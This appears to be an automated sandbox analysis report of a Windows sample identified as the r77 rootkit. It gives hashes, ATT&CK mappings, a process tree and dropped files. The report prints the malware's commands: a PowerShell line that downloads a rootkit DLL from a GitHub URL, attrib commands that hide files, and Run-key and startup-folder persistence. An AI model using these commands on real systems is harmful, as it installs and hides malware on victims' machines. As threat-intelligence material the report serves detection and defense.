r77 | 801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

Analysis

max time kernel
594s
max time network
602s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2023 23:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client3245tt3q45.exe
Size

29KB
MD5

85253b35dcea8e7131541bd1ede1f686
SHA1

6c69103a6719fd3c612d992e56eb863b025d7433
SHA256

801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893
SHA512

e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8
SSDEEP

768:GecUMOOo5HCljU0rDdIA/MDMAP79xt3C2hGXbGjD:5MON5KIAUDdT973C2hObg

Score

10^/10

r77 evasion persistence rootkit

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

r77
r77 is an open-source, userland rootkit.
rootkit r77

r77 rootkit payload 2 IoCs

Detects the payload of the r77 rootkit.

resource	yara_rule
behavioral2/files/0x0007000000022e04-45.dat	r77_payload
behavioral2/files/0x0009000000022e14-49.dat	r77_payload

Blocklisted process makes network request 2 IoCs

flow	pid	Process
42	4868	powershell.exe
44	4868	powershell.exe

Downloads MZ/PE file
Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3592	attrib.exe
4152	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	Client3245tt3q45.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	$77-.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe	$77-.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe	$77-.exe

Executes dropped EXE 1 IoCs

pid	Process
2604	$77-.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77- = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-.exe"	$77-.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77- = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-.exe"	$77-.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe
Token: 33	2604	$77-.exe
Token: SeIncBasePriorityPrivilege	2604	$77-.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 2920	776	Client3245tt3q45.exe	98
PID 776 wrote to memory of 2920	776	Client3245tt3q45.exe	98
PID 776 wrote to memory of 2920	776	Client3245tt3q45.exe	98
PID 2920 wrote to memory of 3592	2920	cmd.exe	100
PID 2920 wrote to memory of 3592	2920	cmd.exe	100
PID 2920 wrote to memory of 3592	2920	cmd.exe	100
PID 776 wrote to memory of 4572	776	Client3245tt3q45.exe	101
PID 776 wrote to memory of 4572	776	Client3245tt3q45.exe	101
PID 776 wrote to memory of 4572	776	Client3245tt3q45.exe	101
PID 2220 wrote to memory of 2604	2220	explorer.exe	103
PID 2220 wrote to memory of 2604	2220	explorer.exe	103
PID 2220 wrote to memory of 2604	2220	explorer.exe	103
PID 2604 wrote to memory of 1372	2604	$77-.exe	105
PID 2604 wrote to memory of 1372	2604	$77-.exe	105
PID 2604 wrote to memory of 1372	2604	$77-.exe	105
PID 1372 wrote to memory of 4152	1372	cmd.exe	107
PID 1372 wrote to memory of 4152	1372	cmd.exe	107
PID 1372 wrote to memory of 4152	1372	cmd.exe	107
PID 2604 wrote to memory of 628	2604	$77-.exe	108
PID 2604 wrote to memory of 628	2604	$77-.exe	108
PID 2604 wrote to memory of 628	2604	$77-.exe	108
PID 628 wrote to memory of 4868	628	cmd.exe	110
PID 628 wrote to memory of 4868	628	cmd.exe	110
PID 628 wrote to memory of 4868	628	cmd.exe	110

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3592	attrib.exe
4152	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe
"C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3592
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\$77-.exe
  2⤵
  PID:4572

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2220
- C:\ProgramData\$77-.exe
  "C:\ProgramData\$77-.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\ProgramData\$77-.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\ProgramData\$77-.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\\r77-x64.dll');exit
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\$77-.exe

Filesize
29KB

MD5
85253b35dcea8e7131541bd1ede1f686

SHA1
6c69103a6719fd3c612d992e56eb863b025d7433

SHA256
801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

SHA512
e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

Download Submit
C:\ProgramData\$77-.exe

Filesize
29KB

MD5
85253b35dcea8e7131541bd1ede1f686

SHA1
6c69103a6719fd3c612d992e56eb863b025d7433

SHA256
801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

SHA512
e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

Download Submit
C:\ProgramData\r77-x64.dll

Filesize
147KB

MD5
1b8bd653321cf3cbc786e563555fbc75

SHA1
5638efe0476c8c1b74c6604db419be814d1d90a0

SHA256
919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7

SHA512
bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77-615f875c58fb462dbe0d241a19c2f83c-x64.dll

Filesize
147KB

MD5
1b8bd653321cf3cbc786e563555fbc75

SHA1
5638efe0476c8c1b74c6604db419be814d1d90a0

SHA256
919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7

SHA512
bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rot.bat

Filesize
235B

MD5
fa2df82470638d18f85bc54dd7f001aa

SHA1
eae60eab30561b413dba2924782a858722c0ecbe

SHA256
ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

SHA512
f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwxnfbnc.gfg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/776-0-0x0000000000BC0000-0x0000000000BCE000-memory.dmp

Filesize
56KB

Download
memory/776-9-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/776-4-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/776-3-0x00000000055C0000-0x000000000565C000-memory.dmp

Filesize
624KB

Download
memory/776-6-0x0000000006460000-0x00000000064F2000-memory.dmp

Filesize
584KB

Download
memory/776-5-0x00000000055B0000-0x00000000055C0000-memory.dmp

Filesize
64KB

Download
memory/776-2-0x0000000005AD0000-0x0000000006074000-memory.dmp

Filesize
5.6MB

Download
memory/776-1-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/2604-12-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/2604-13-0x0000000005900000-0x0000000005910000-memory.dmp

Filesize
64KB

Download
memory/2604-50-0x0000000006BF0000-0x0000000006BFA000-memory.dmp

Filesize
40KB

Download
memory/2604-44-0x0000000005900000-0x0000000005910000-memory.dmp

Filesize
64KB

Download
memory/2604-43-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/4868-20-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/4868-34-0x00000000057D0000-0x0000000005B24000-memory.dmp

Filesize
3.3MB

Download
memory/4868-35-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

Filesize
120KB

Download
memory/4868-36-0x0000000005D40000-0x0000000005D8C000-memory.dmp

Filesize
304KB

Download
memory/4868-37-0x0000000007550000-0x0000000007BCA000-memory.dmp

Filesize
6.5MB

Download
memory/4868-38-0x0000000006200000-0x000000000621A000-memory.dmp

Filesize
104KB

Download
memory/4868-42-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/4868-24-0x00000000055F0000-0x0000000005656000-memory.dmp

Filesize
408KB

Download
memory/4868-23-0x0000000004E10000-0x0000000004E32000-memory.dmp

Filesize
136KB

Download
memory/4868-22-0x0000000004FC0000-0x00000000055E8000-memory.dmp

Filesize
6.2MB

Download
memory/4868-21-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4868-19-0x00000000023B0000-0x00000000023E6000-memory.dmp

Filesize
216KB

Download